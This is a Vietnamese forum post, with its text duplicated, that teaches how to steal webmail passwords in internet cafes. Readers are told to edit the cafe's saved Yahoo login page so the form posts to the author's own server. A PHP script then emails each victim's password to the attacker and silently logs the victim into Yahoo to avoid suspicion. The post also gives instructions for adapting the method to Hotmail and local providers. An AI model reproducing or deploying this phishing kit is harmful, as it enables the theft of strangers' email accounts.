loveyoumorethanicansay
26-08-2004, 20:43
Các bạn thân mến, bài viết về hướnd dẫn ăn cắp Password của Yahoo, Hotmail, cũng như các loại web base email khác thì đã có nhiều bài viết đề cập đến rồi, bài viết này ko có mục đích đề cập lại vấn đề đó.
Bài này chỉ có mục đích hướng dẫn bạn ứng dụng những gì có được từ thủ thụât fake login để ăn cắp Pass ở ngoài dịch vụ.
Theo như tôi thấy, thì hiện hay, hầu hết các dịch vụ Internet đều tự tạo (hoặc copy ) cho mình một trang web riêng, trang web này thường được save trực tiếp vào máy tính và được set làm homepage, nội dung của nó là chứa một số link thông dụng cho khách hàng tiện truy cập, ví dụ như login vào Yahoo, hotmail,v.v... Các trang login này được tạo nên bằng cách save as các trang login của webmail đó vào máy tính. Mục đích là nhằm làm tăng tốc duyệt web cho khách hàng
Công việc của chúng ta là viết một chương trình nhỏ, bằng ngôn ngữ gì cũng được, chương tình này có tác dụng ghi nhận username và password mỗi khi người sử dụng submit, upload nó lên server có hỗ trợ ngôn ngữ mà nó sử dụng, ghi nhận link đến chương trình này.
Chẳng hạn, tôi code một chương trình nhỏ bằng php, tôi đặt tên là yahoo.php và upload nó lên thư mục gốc server longhp.host.sk của tôi. Vậy, link đến chương trình này là http: //longhp.host.sk/yahoo.php.
Tiếp theo, các bạn dùng notepad, Open cái file login của Yahoo lên (file đã được save vào máy tính của cửa hàng NET - Nếu ko biết đích xác nó nằm ở đâu thì cứ vào IE, click vào home, click tiếp vào link đến Yahoo để point đến trang đó, sau đấy click chuột phải vào chỗ trống ở trang web và chọn view source cũng OK).
Ấn F3 để thực hiện tìm kiếm, gõ vào ô tìm kiếm:
CODE
action=
Bạn sẽ thấy một đoạn code có dạng:
CODE
<form action=https: //login.yahoo.com.... >
OK, bạn xoá hết dòng này đi (từ <form ... đến thẻ > của <form),
Và thay bằng
CODE
<form action='http: //longhp.host.sk/yahoo.php' methor='post'>
(Chú ý: bạn phải thay thế http: //longhp.host.sk/yahoo.php bằng đường dẫn chính xác đến chương trình của bạn)
Đã xong, save cái trang này lại, close notepad, đi về nhà và... nằm đợi password send vào mail cho bạn
================================================== ==
Dưới đây là mã nguồn Script Yahoo.php của tôi, tôi viết ra đây cho các bạn tham khảo, có giải thích cụ thể cách làm việc, với hy vọng rằng, nếu ai ko biết PHP mà biết ASP, Perl hoặc CFM,... đều có thể vận dụng để viết một chương trình tương tự cho mình.
CODE
<?
//Gui mail
$contactemail = "[email protected]"; //
$subject = "password of [email protected] : $passwd";
$message = "";
mail($contactemail, $subject, $message);
//Chuyen sang phan login that su cua Yahoo
header("location: http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src= ym&.last=&promo=&.intl type=us&.bypass=&.partner=&.u = 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done =&login=$login&passwd=$passwd&.persistent=");
?>
Chương trình này có hai nhiệm vụ:
1. Sau khi user submit thì nó sẽ đón nhận lấy hai thông tin quan trọng là username (lưu giữ bởi biến $login) và password (được lưu giữ bởi biến $passwd) (đối với Yahoo) - Khi view source trang login của Yahoo bạn sẽ thấy đúng như vậy. Sau đó chương trình dùng một lệnh sendmail để gửi mail về cho chúng ta.
2. Chuyển tiếp hai giá trị $login và $passwd đến Yahoo để đăng nhập user này vào Yahoo (nếu ko sẽ bị nghi ngờ ngay )
Giải thích thêm: Về nguyên tắc, bạn có thể chỉ cần gọi một link sau: https: //login.yahoo.com/config/login?login=name_cua_ban&passwd=pass_cua_ban để đăng nhập vào Yahoo thông qua URL nhưng nếu test thử bạn sẽ thấy, sau khi đăng nhập nó ko vào hộp mail cho bạn mà sẽ nhẩy đến trang my.yahoo.com, và vì vậy cũng có thể làm cho victim nghi ngờ. Cho nên bạn phải gọi một URL có dạng http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last =&promo=&.intl type=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v =0&hasMsgr=0&.chkP=Y&.done =&login=name_cua_ban&passwd=pass_cua_ban&.persiste nt= để đăng nhập vào mail box ở Yahoo và vào được luôn phần xem mail.
Bạn sẽ thắc mắc, "cái đuôi" lằng nhằng ở đằng sau URL là gì và tôi lấy mấy cái đó ở đâu ra. Trả lời: đó là các tham biến cần thiết phải truyền tới cho Yahoo để nó biết cách "cư xử' sau khi login chúng ta vào mail box. Còn việc lấy các tham số đó ở đâu, rất dễ, bạn chỉ việc view soruce trang login thật sự của Yahoo, tìm tất cả các thẻ <input , <select, <option ... sẽ thấy dạng sau:
CODE
<input type=hidden name=".tries" value="" >
<input type=hidden name=".src" value="ym" >
<input type=hidden name=".md5" value="" >
<input type=hidden name=".hash" value="" >
Ta có tương ứng các biến và giá trị của nó,
biến-------------giá trị-----------Truyền vào URL
.tries - (rỗng) - &.tries=
.src - ym - &.src=ym
v.v....
Bạn tìm và ghép lại tất cả các biến sẽ được link http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=& .intl type=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&h asMsgr=0&.chkP=Y&.done=&login=$login&passwd=$passw d&.persistent=
Vậy, đây cũng là cách tổng quát để tìm URL login cho các webmail khác, ví dụ hotmail, fpt, saigonnet, vnn...
Cách làm này chuối ở chỗ là ko thể hack chính xác được victim mà mình muốn, nhưng cũng khá thú vị phải không, chúc các bạn hack vui vẻ. Và nếu ai đã có công tìm URL login của các webmail khác thì post lên đây cho bà con tham khảo, đỡ tốn công tìm lại
( SUA TAM TU HVAONLINE.NET)
Bài này chỉ có mục đích hướng dẫn bạn ứng dụng những gì có được từ thủ thụât fake login để ăn cắp Pass ở ngoài dịch vụ.
Theo như tôi thấy, thì hiện hay, hầu hết các dịch vụ Internet đều tự tạo (hoặc copy ) cho mình một trang web riêng, trang web này thường được save trực tiếp vào máy tính và được set làm homepage, nội dung của nó là chứa một số link thông dụng cho khách hàng tiện truy cập, ví dụ như login vào Yahoo, hotmail,v.v... Các trang login này được tạo nên bằng cách save as các trang login của webmail đó vào máy tính. Mục đích là nhằm làm tăng tốc duyệt web cho khách hàng
Công việc của chúng ta là viết một chương trình nhỏ, bằng ngôn ngữ gì cũng được, chương tình này có tác dụng ghi nhận username và password mỗi khi người sử dụng submit, upload nó lên server có hỗ trợ ngôn ngữ mà nó sử dụng, ghi nhận link đến chương trình này.
Chẳng hạn, tôi code một chương trình nhỏ bằng php, tôi đặt tên là yahoo.php và upload nó lên thư mục gốc server longhp.host.sk của tôi. Vậy, link đến chương trình này là http: //longhp.host.sk/yahoo.php.
Tiếp theo, các bạn dùng notepad, Open cái file login của Yahoo lên (file đã được save vào máy tính của cửa hàng NET - Nếu ko biết đích xác nó nằm ở đâu thì cứ vào IE, click vào home, click tiếp vào link đến Yahoo để point đến trang đó, sau đấy click chuột phải vào chỗ trống ở trang web và chọn view source cũng OK).
Ấn F3 để thực hiện tìm kiếm, gõ vào ô tìm kiếm:
CODE
action=
Bạn sẽ thấy một đoạn code có dạng:
CODE
<form action=https: //login.yahoo.com.... >
OK, bạn xoá hết dòng này đi (từ <form ... đến thẻ > của <form),
Và thay bằng
CODE
<form action='http: //longhp.host.sk/yahoo.php' methor='post'>
(Chú ý: bạn phải thay thế http: //longhp.host.sk/yahoo.php bằng đường dẫn chính xác đến chương trình của bạn)
Đã xong, save cái trang này lại, close notepad, đi về nhà và... nằm đợi password send vào mail cho bạn
================================================== ==
Dưới đây là mã nguồn Script Yahoo.php của tôi, tôi viết ra đây cho các bạn tham khảo, có giải thích cụ thể cách làm việc, với hy vọng rằng, nếu ai ko biết PHP mà biết ASP, Perl hoặc CFM,... đều có thể vận dụng để viết một chương trình tương tự cho mình.
CODE
<?
//Gui mail
$contactemail = "[email protected]"; //
$subject = "password of [email protected] : $passwd";
$message = "";
mail($contactemail, $subject, $message);
//Chuyen sang phan login that su cua Yahoo
header("location: http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src= ym&.last=&promo=&.intl type=us&.bypass=&.partner=&.u = 6l335nstlpk8v&.v=0&hasMsgr=0&.chkP=Y&.done =&login=$login&passwd=$passwd&.persistent=");
?>
Chương trình này có hai nhiệm vụ:
1. Sau khi user submit thì nó sẽ đón nhận lấy hai thông tin quan trọng là username (lưu giữ bởi biến $login) và password (được lưu giữ bởi biến $passwd) (đối với Yahoo) - Khi view source trang login của Yahoo bạn sẽ thấy đúng như vậy. Sau đó chương trình dùng một lệnh sendmail để gửi mail về cho chúng ta.
2. Chuyển tiếp hai giá trị $login và $passwd đến Yahoo để đăng nhập user này vào Yahoo (nếu ko sẽ bị nghi ngờ ngay )
Giải thích thêm: Về nguyên tắc, bạn có thể chỉ cần gọi một link sau: https: //login.yahoo.com/config/login?login=name_cua_ban&passwd=pass_cua_ban để đăng nhập vào Yahoo thông qua URL nhưng nếu test thử bạn sẽ thấy, sau khi đăng nhập nó ko vào hộp mail cho bạn mà sẽ nhẩy đến trang my.yahoo.com, và vì vậy cũng có thể làm cho victim nghi ngờ. Cho nên bạn phải gọi một URL có dạng http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last =&promo=&.intl type=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v =0&hasMsgr=0&.chkP=Y&.done =&login=name_cua_ban&passwd=pass_cua_ban&.persiste nt= để đăng nhập vào mail box ở Yahoo và vào được luôn phần xem mail.
Bạn sẽ thắc mắc, "cái đuôi" lằng nhằng ở đằng sau URL là gì và tôi lấy mấy cái đó ở đâu ra. Trả lời: đó là các tham biến cần thiết phải truyền tới cho Yahoo để nó biết cách "cư xử' sau khi login chúng ta vào mail box. Còn việc lấy các tham số đó ở đâu, rất dễ, bạn chỉ việc view soruce trang login thật sự của Yahoo, tìm tất cả các thẻ <input , <select, <option ... sẽ thấy dạng sau:
CODE
<input type=hidden name=".tries" value="" >
<input type=hidden name=".src" value="ym" >
<input type=hidden name=".md5" value="" >
<input type=hidden name=".hash" value="" >
Ta có tương ứng các biến và giá trị của nó,
biến-------------giá trị-----------Truyền vào URL
.tries - (rỗng) - &.tries=
.src - ym - &.src=ym
v.v....
Bạn tìm và ghép lại tất cả các biến sẽ được link http: //login.yahoo.com/config/login?6rfn98dak5km4&.tries=&.src=ym&.last=&promo=& .intl type=us&.bypass=&.partner=&.u=6l335nstlpk8v&.v=0&h asMsgr=0&.chkP=Y&.done=&login=$login&passwd=$passw d&.persistent=
Vậy, đây cũng là cách tổng quát để tìm URL login cho các webmail khác, ví dụ hotmail, fpt, saigonnet, vnn...
Cách làm này chuối ở chỗ là ko thể hack chính xác được victim mà mình muốn, nhưng cũng khá thú vị phải không, chúc các bạn hack vui vẻ. Và nếu ai đã có công tìm URL login của các webmail khác thì post lên đây cho bà con tham khảo, đỡ tốn công tìm lại
( SUA TAM TU HVAONLINE.NET)